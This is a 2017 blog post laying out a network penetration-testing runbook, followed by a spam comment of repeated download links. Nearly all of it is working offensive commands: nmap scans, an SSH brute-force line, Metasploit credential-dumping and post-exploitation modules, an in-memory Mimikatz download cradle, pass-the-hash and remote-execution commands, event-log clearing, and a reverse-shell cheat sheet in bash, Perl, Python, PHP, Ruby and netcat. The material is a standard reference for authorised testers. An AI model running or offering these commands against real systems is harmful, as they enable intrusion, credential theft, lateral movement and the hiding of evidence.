Jumat, 01 September 2017

Runbook (Network Pentesting)

This is a rough copy of a runbook I am building for penetration testing. Still in progress. Suggestions please contact me.

Recon


nmap -sS -O -p1-65535 --script banner 192.168.1.1/24
Scan all ports and detect OS + banner grab
nmap -sT -sU -sV -O -p1-65535 --script banner 192.168.1.1/24
TCP(full connect scan) + UDP scan + service version + OS detection + banner of all ports (slow)
nmap -sn -n T4 192.168.1.1/24
Ping scan with no dns resolution
nmap -Pn -sS -T4 -sV -O --reason -oA filename 192.168.1.1/24
Port scan all hosts + OS Detection + service version + Output to all formats + port response info
FOR /L %x in (1,1,255) do ping -n 1 192.168.2.%x | find /I "reply" >> c:\temp\pingresult.txt
Ping scan from Windows command line
1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("192.168.2.$_") } | where-object {$_.Status -eq "success"} | select Address
Ping scan with Windows Powershell

Brute Force


ncrack -u user -P password_list.txt -p ssh 192.168.1.1
Run SSH brute force

Enumeration


enum4linux - Portcullis Labs
Plundering Windows Account Info via Authenticated SMB Sessions - Sans Penetration Testing

SQL


Hunting MySQL - Metasploit Unleashed
Admin-mssql-auxiliary-modules - Metasploit Unleashed
Attacking mssql with Metasploit - Darkoperator
Attacking MySQL with Metasploit - Pentestlab

Capture


Responder 2.0 - Owing Windows Networks part 2 - SpiderLabs
Responder 2.0 - Owning Windows Networks part 3 - SpiderLabs

Vulnerabiltiy Analysis


nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445
Check for MS08-067 and other SMB vulns

Privilege escalation


meterpreter> getuid
Display the user that the Meterpreter server is running as on the host
whoami
Windows or Linux check current user
whoami /groups
Windows – to check integrity level and permissions
id
Linux – check permissions of current user
meterpreter> user post/windows/gather/win_privs
This module will print if UAC is enabled, and if the current account is ADMIN enabled. It will also print UID,foreground SESSION ID, is SYSTEM status and current process PRIVILEGES
meterpreter> getsystem
Attempt to get system privs on system

Dumping hashes


Windows
meterpreter> run post/windows/gather/hashdump
Dump the local user accounts from the SAM database using the registry
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<invoke-mimkatz>'); Invoke-Mimikatz -DumpCreds"
Run Invoke-Mimikatz in memory with Powershell web cradle. You can add all arguments to the end of command
meterpreter> use post/windows/gather/credentials/domain_hashdump
Dump hashes from domain controller safely

Windows


Windows Privilege Escalation Fundamentals - FuzzySecurity
UAC what penetration testers should know - Cobalt Strike blog
windows-privesc-check - PentestMonkeys
Veil-Powerup usage guide - Harmj0y
Windows Exploit Suggester - GDSSecurity
Metasploit local exploit suggester - Metasploit
pinjector - Tarasco

Linux


Unix & Linux password cracking - Nixcraft
Basic Linux Privilege Escalation - g0tmi1k
Unix-privesc-check - Pentestmonkeys
LinEnum - rebootuser
Linuxprivchecker - rebootuser
Exploiting SUID executables - Pentestpartners

Post Exploitation


post/windows/recon/computer_browser_discovery - Uses railgun to discover hostnames and IPs on the network
post/windows/gather/arp-scanner - Scan without pinging boxes
post/windows/gather/cachedump - Dump domain creds
post/window/gather/checkvm - Check if host is a vm
post/window/gather/credentials/gpp - Pulls passwords out from group policy
post/window/gather/tortoisesvn - Windows admins use for svn
post/window/gather/winscp - Secure copy protocol this pulls out passwords
post/window/gather/dnscache_dump - See what sites users have visited
post/window/gather/enum_applications - Finds applications installed on computer
post/window/gather/enum_chrome /enum_ie/enum_firefox - Enumerates Firefox
post/window/gather/enum_termserv - Shows where box has rdp too
post/window/gather/enum_anattend - Contains creds
post/window/gather/inject_ca - Injects cert auth into the box
post/window/gather/inject_ca - Deletes cert auth to remove restrictions
post/window/gather/wlan/wlan_profile - Dumps wifi password in clear text for win7 and abovepost/windows/gather/enum_tokens - This module will identify systems that have a Domain Admin (delegation) token on them
A portion of the above list is from the Metasploit Minute Video here

Active Directory


post/window/gather/enum_ad_computers - find computer on the domain very stealth
post/windows/gather/enum_ad_service_principal_names - find sql servers etc running services
post/window/gather/enum_ad_user_comments - User comments contains passwords for some

net view /domain
List domain association
net view /domain:(domain)
List hosts on domain. Same as network neighborhood
net view /domain "Domain Computers"
List all domain computers
net view \\(computername)
List shares on a computer
net user /domain
List all users in domain
net group /domain
List all groups in domain
net group /domain "group name"
List users in group on domain
net user /domain "user"
List information about domain user including group membership
nltest /dclist:(domain)
List all domain controllers on domain
nltest /domain_trust
Map domain trust
net localgroup /domain "administrators"
List all domain controller administrators
net user username password /ADD
Add local user account
net user username password /ADD /DOMAIN
Add new user account to domain
wmic useraccount
List all local accounts with SID
Get-AdUser -Filter * -Properties SamAccountName, description | select SamAccountName, description | select -expand $_.results
Get descriptions from AD to look for passwords stored in AD account. Can be done from any domain user

Running DLL

rundll32.exe dllname.dll,StartW

File exploring

dir /S /B
Dirwalk Windows

Passing shells

meterpreter> use post/window/manage/payload_inject
Create a new shell on box you already owned. 2 is 1 and 1 is none. Can be used to send session to another user

Lateral Movement


dir \\host\c$
Check to see if your admin on another computer by listing the c$ share
runas /user:Domain\(user) something.exe
Create a token with creds from command line
runas /user:Domain\(user) /netonly something.exe
Create a token to pass creds
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND
Pass the hash with Mimikatz
SCHTASKS /Run /S system /U user /P password /I /TN "taskname"
Run task immediately on remote system
wmic /node:(host) process call create (path to exe)
Run exe on remote computer with WMIC
Powershell Invoke-Command -ComputerName (host) -ScriptBlock { dir c:\ }
WinRM(port 5985) turned off by default(turned on for administration) Run command with Windows remoting

Cleaning up


meterpreter> clearev
Will clear the Application, System and Security logs on a Window systems. There are no options or arguments

Reverse Shells


Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python Psuedo terminal

python -c "import pty;pty.spawn('/bin/bash')"
Use this on raw shells

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat Linux

nc -e /bin/sh 10.0.0.1 1234

Netcat Windows

nc 10.10.0.1 1234 -e cmd.exe

References

Reverse shell cheat sheet - Pentestmonkeys
Netcat cheat sheet v1 - Sans Penetration Testing

1 komentar:

  1. Pen Test Diary: Runbook (Network Pentesting) >>>>> Download Now

    >>>>> Download Full

    Pen Test Diary: Runbook (Network Pentesting) >>>>> Download LINK

    >>>>> Download Now

    Pen Test Diary: Runbook (Network Pentesting) >>>>> Download Full

    >>>>> Download LINK yX

    BalasHapus